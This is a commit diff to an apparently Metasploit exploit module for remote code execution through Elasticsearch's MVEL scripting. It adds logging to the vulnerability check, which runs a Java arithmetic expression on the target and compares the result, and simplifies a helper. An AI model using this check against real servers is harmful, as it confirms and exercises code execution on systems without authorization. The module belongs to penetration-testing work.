Add logging to show executed Java and result

jhart-r7 · jhart-r7 · commit 14db112c3234 · 2015-01-08T16:53:12.000-08:00
diff --git a/modules/exploits/multi/elasticsearch/script_mvel_rce.rb b/modules/exploits/multi/elasticsearch/script_mvel_rce.rb
@@ -105,12 +105,16 @@ def vulnerable?
     sum = addend_one + addend_two
 
     java = java_sum([addend_one, addend_two])
+
+    vprint_status("#{peer} attempting to execute '#{java}' in Java")
     res = execute(java)
     result = parse_result(res)
 
     if result.nil?
+      vprint_status("#{peer} no response to executed Java")
       return false
     else
+      vprint_status("#{peer} response to executed Java: #{result}")
       result.to_i == sum
     end
   end
@@ -136,11 +140,7 @@ def parse_result(res)
   end
 
   def java_sum(summands)
-    source = <<-EOF
-#{summands.join(" + ")}
-    EOF
-
-    source
+    summands.join(' + ')
   end
 
   def to_java_byte_array(str)
